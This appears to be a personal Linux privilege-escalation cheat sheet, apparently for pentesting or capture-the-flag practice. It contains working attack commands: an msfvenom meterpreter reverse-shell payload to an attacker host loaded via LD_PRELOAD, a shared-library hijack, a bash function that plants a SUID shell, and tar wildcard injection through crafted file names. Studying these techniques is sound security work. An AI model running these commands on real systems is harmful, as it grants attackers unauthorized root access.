1. Per­form basic sys­tem enumeration
2. Per­form esca­la­tion scripts
3. Check run­ning software 
   1. Check for exploits
   2. Check for con­fig files with sen­si­tive content
   3. Check for log output
   4. Check doc­u­men­ta­tion for use­ful functions
   5. Check source code
4. Try mem­o­ry investigation
5. Start the process again.

Additional ideas

• Run pspy to mon­i­tor the system. 
  • Or try strace analy­sis on a par­tic­u­lar file.
• If dbus is avail­able, check here and here
• Com­pile escape bina­ry and let it call via a root process / or add in a root process the suid bit.
• Analyse all uncom­mon pro­grams (see Fuzzing)
• If I want to exe­cute a pro­gram but don’t have the exe­cutable bit, just use cp to copy a file with the prop­er file attrib­ut­es and then use cat to over­write the file con­tent with the pro­gram. The oersmis­sions remain the same.
• You can exe­cute a pro­gram as anoth­er user (via SUID or SGUID?) which is dynam­i­cal­ly linked? Get a shell for this user: 
  1. Cre­ate a library paload:
     msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$attackerip LPORT=80 -f elf-so > /tmp/a.so
  2. Load this pay­load in the pro­gram’s con­text:
     LD_PRELOAD=/tmp/a.so ls

Environment exploitation

• Analyse bina­ries with high­er priv­ilges if they try to include a shared library in a direc­to­ry we control. 
  1. Make a list of pos­si­ble files.
  2. Check all of them for libraries they load:
     strace /usr/local/bin/suid-so 2>&1 | grep -r -E "open|access|no such file"
  3. Check the out­put if you can write to a location.
  4. If yes, use escape_lib.c and com­pile it:
     gcc -shared -fPIC -o escape_lib.so escape_lib.c
  5. Exe­cute the orig­i­nal bina­ry with high­er priv­i­leges. It now droppes a shell.
  6. Remove the exploit so that the pro­gram works nor­mal­ly for others.
• Analyse (with strace, strings, …) if a bina­ry with high­er priv­i­leges calls anoth­er bina­ry. Check where these bina­ries are. Check if you can add a bina­ry with the same name via an extend­ed PATH vari­able so that your bina­ry is called instead. 
  • If the bina­ry is called with the full path, then use a bash func­tion which is called ear­li­er:
    function /usr/sbin/useradd() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }

Interpolation exploitation

Pre­req­ui­sites:

• A (script) file is exe­cut­ed with high­er privileges.
• There is a com­mand into it with a *.
• You can write at a path the script uses.

Then, cre­ate a file in a direc­to­ry which is names like para­me­ters from the pro­gram. The pro­gram will inter­pret the file­names as arguments.

Exam­ple: Assume there is a call like this in a script:

tar czf /tmp/backup.tar.gz *

The script is in /home/peter and because we are this user, we can write into this direc­to­ry. Now,

1. cre­ate an exe­cute­able pay­load file and
2. cre­ate emp­ty files which are called after paramters, e.g.
   touch /home/peter/--checkpoint=1
touch /home/peter/--checkpoint-action=exec=sh\exploit.sh

Ideas of dispear

• Some appli­ca­tions does­n’t work any­more, but old one may do. Try an old attack­ing machine or ver­sion of some pre­vi­ous­ly tried software.
• If your user has mul­ti­ple groups: 
  • use id for show­ing the cur­rent group
  • use new­group $oth­er­group to switch in this pri­ma­ry group
  • repeat id

External resources

• Pay­load­All­TheThings
• Check­list from hacktricks
• Basic Lin­ux Priv­i­lege Escalation
• Ude­my Lin­ux PrivEsc Course Sum­ma­ry and Link site
• Check­list of areas
• Anoth­er checklist